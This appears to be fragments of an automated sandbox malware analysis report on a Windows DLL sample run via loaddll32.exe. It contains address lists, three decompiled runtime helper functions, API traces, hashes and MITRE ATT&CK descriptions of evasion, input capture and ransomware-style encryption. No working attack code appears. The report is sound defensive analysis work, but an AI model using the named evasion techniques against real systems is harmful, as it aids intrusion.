0x6ea55b09
0x6ea55b0c
0x6ea55b13
0x6ea55b19
0x6ea55b20
0x6ea55b23
0x6ea55b25
0x6ea55b29
0x6ea55b33
0x6ea55b33
0x6ea55b35
0x6ea55b3b
0x6ea55b3e
0x6ea55b40
0x6ea55b46
0x6ea55b47
0x6ea55b4d
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea55b2b
0x6ea55b2b
0x6ea55b2b
0x6ea55b2e
0x6ea55b2f
0x00000000
0x6ea55b2b
0x6ea55b1b
0x00000000
0x6ea55b1b
0x6ea55af4
0x6ea55af9
0x6ea55afb
0x6ea55afd
0x00000000
0x6ea55ac4
0x6ea55ac4
0x6ea55ac9
0x6ea55acb
0x6ea55acc
0x6ea55b02
0x6ea55b02
0x6ea55b50
0x6ea55b51
0x6ea55b57
0x00000000
0x6ea55b59
0x6ea55a4c
0x6ea55a4c
0x6ea55a53
0x6ea55a54
0x6ea55a56
0x6ea55a5b
0x6ea55b5a
0x00000000
0x6ea55b5a
0x6ea55a45
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EA55A6D, 6EA55A74, 6EA55AA8

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 63bb3b99cb5fba5b4311ded9bc3f00648b5f55036a6b40701e44d8013cf74b97
Instruction ID: 31af03122d09176f503812a91f1ee1c9bb8801b4ddacb52d4a9c70aefb450a62
Opcode Fuzzy Hash: 63bb3b99cb5fba5b4311ded9bc3f00648b5f55036a6b40701e44d8013cf74b97
Instruction Fuzzy Hash: FA41A371E14618AFCB11DFD9C98899EBBFCEF86310B154496E504E7300E7709E91CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5986E, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EA5986E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				int _t48;
				intOrPtr _t56;
				int _t58;
				short* _t60;
				signed int _t61;
				short* _t62;

				_t30 =  *0x6ea93004; // 0x90a7628e
				_v8 = _t30 ^ _t61;
				E6EA5633D(__ebx,  &_v32, __edx, _a4);
				_t48 = _a24;
				if(_t48 == 0) {
					_t48 =  *(_v28 + 8);
				}
				_t58 = 0;
				_t36 = MultiByteToWideChar(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E6EA53252(_v8 ^ _t61);
				} else {
					_t56 = _t36 + _t36;
					_t52 = _t56 + 8;
					_v12 = _t56;
					asm("sbb eax, eax");
					_t40 = _t36 & _t56 + 0x00000008;
					if(_t40 == 0) {
						_t60 = 0;
						L12:
						if(_t60 != 0) {
							E6EA54050(_t58, _t60, _t58, _t56);
							_t43 = MultiByteToWideChar(_t48, 1, _a12, _a16, _t60, _v16);
							if(_t43 != 0) {
								_t58 = GetStringTypeW(_a8, _t60, _t43, _a20);
							}
						}
						E6EA59972(_t60);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t60 = E6EA58C23(_t52, _t40);
						if(_t60 == 0) {
							L10:
							_t56 = _v12;
							goto L12;
						}
						 *_t60 = 0xdddd;
						L9:
						_t60 =  &(_t60[4]);
						goto L10;
					}
					E6EA5CFE0();
					_t60 = _t62;
					if(_t60 == 0) {
						goto L10;
					}
					 *_t60 = 0xcccc;
					goto L9;
				}
			}

0x6ea59876
0x6ea5987d
0x6ea59889
0x6ea5988e
0x6ea59893
0x6ea59898
0x6ea59898
0x6ea5989d
0x6ea598b6
0x6ea598bc
0x6ea598c1
0x6ea5994c
0x6ea59950
0x6ea59955
0x6ea59955
0x6ea59971
0x6ea598c7
0x6ea598c7
0x6ea598ca
0x6ea598cd
0x6ea598d2
0x6ea598d4
0x6ea598d6
0x6ea5990d
0x6ea5990f
0x6ea59911
0x6ea59916
0x6ea5992b
0x6ea59933
0x6ea59943
0x6ea59943
0x6ea59933
0x6ea59946
0x00000000
0x6ea5994b
0x6ea598dd
0x6ea598f8
0x6ea598fd
0x6ea59908
0x6ea59908
0x00000000
0x6ea59908
0x6ea598ff
0x6ea59905
0x6ea59905
0x00000000
0x6ea59905
0x6ea598df
0x6ea598e4
0x6ea598e8
0x00000000
0x00000000
0x6ea598ea
0x00000000
0x6ea598ea

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6EA57A69,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B), ref: 6EA598B6
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6EA5992B
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6EA5993D
__freea.LIBCMT ref: 6EA59946

Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: cfba9ee196c2016b42282e9245acb4c75994bc20f731b146b9660f9940806d6d
Instruction ID: c7b82c5065a88dc103cff60fa9f2841f6ea2595f04de5cd02321b3d31ccf5ec9
Opcode Fuzzy Hash: cfba9ee196c2016b42282e9245acb4c75994bc20f731b146b9660f9940806d6d
Instruction Fuzzy Hash: 3931A2B190021AEFDB118FE5DD44EEF7B79EF45320F054564E828AA350D73489A1CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5B266, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA5B266(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6ea93740, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6EA5B24F();
					E6EA5B211();
					_t13 = WriteConsoleW( *0x6ea93740, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6ea5b283
0x6ea5b287
0x6ea5b294
0x6ea5b299
0x6ea5b2b4
0x6ea5b2b4
0x6ea5b2ba

APIs

WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001), ref: 6EA5B27D
GetLastError.KERNEL32(?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020,00000001,?,6EA5A865,00000008), ref: 6EA5B289

Part of subcall function 6EA5B24F: CloseHandle.KERNEL32(FFFFFFFE,6EA5B299,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020,00000001), ref: 6EA5B25F

___initconout.LIBCMT ref: 6EA5B299

Part of subcall function 6EA5B211: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EA5B240,6EA5AE64,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020), ref: 6EA5B224

WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020), ref: 6EA5B2AE

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c2b716e7add3c922282dcb69d3251bdc97b4b9d1d2169867195b8687fd4d0b85
Instruction ID: 6f8b4df2686824e20c1da2a88c198d7b5406f16630416439c90b6593b28d03a0
Opcode Fuzzy Hash: c2b716e7add3c922282dcb69d3251bdc97b4b9d1d2169867195b8687fd4d0b85
Instruction Fuzzy Hash: 00F01C36050624BBCF525FD5CD0898D7F66FB0A7A2B05C510FA19AA224CA328861EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA561A5, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA561A5() {

				E6EA56E13( *0x6ea94148);
				 *0x6ea94148 = 0;
				E6EA56E13( *0x6ea9414c);
				 *0x6ea9414c = 0;
				E6EA56E13( *0x6ea93e28);
				 *0x6ea93e28 = 0;
				E6EA56E13( *0x6ea93e2c);
				 *0x6ea93e2c = 0;
				return 1;
			}

0x6ea561ae
0x6ea561bb
0x6ea561c1
0x6ea561cc
0x6ea561d2
0x6ea561dd
0x6ea561e3
0x6ea561eb
0x6ea561f4

APIs

_free.LIBCMT ref: 6EA561AE

Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B

_free.LIBCMT ref: 6EA561C1
_free.LIBCMT ref: 6EA561D2
_free.LIBCMT ref: 6EA561E3

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8a7c8a7280e2b51eae4731ec4becc2f8c9183e2099d7d025b953a602f55eaaab
Instruction ID: 547a298eff3e1653572b2c40b9d5c0c2f43df7a49f22324d6be879ad6f882f81
Opcode Fuzzy Hash: 8a7c8a7280e2b51eae4731ec4becc2f8c9183e2099d7d025b953a602f55eaaab
Instruction Fuzzy Hash: 26E04F75831B209A8E226F68D4444863AB5B7AA710322C44AE8143B310DF7509B3AF89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report K5hW6I5xeA

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6692 Parent PID: 5724

General

Chronological Activities

Function 6EA52A10, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220
libraryCOMMONCrypto

Function 6EA5824D, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6EA55D2F, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 6EA51000, Relevance: 43.6, Strings: 34, Instructions: 1055
COMMONCrypto

Function 6EA56B21, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 6EA55900, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 6EA57045, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113
COMMON

Function 6EA5C678, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONCrypto

Function 6EA5817A, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 6EA54940, Relevance: .4, Instructions: 404
COMMON

Function 6EA528D0, Relevance: .1, Instructions: 115
COMMON

Function 6EA56AEE, Relevance: .0, Instructions: 23
COMMON

Function 6EA58F44, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Function 6EA566C1, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Function 6EA5A0F4, Relevance: 10.7, APIs: 7, Instructions: 162
fileCOMMON

Function 6EA53E70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Function 6EA57CEE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Function 6EA5ACBA, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 6EA59992, Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Function 6EA543C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Function 6EA56E65, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
COMMON

Function 6EA57BBF, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Function 6EA56955, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Function 6EA56807, Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Function 6EA5AC19, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Function 6EA55A2A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Function 6EA5986E, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Function 6EA5B266, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 6EA561A5, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON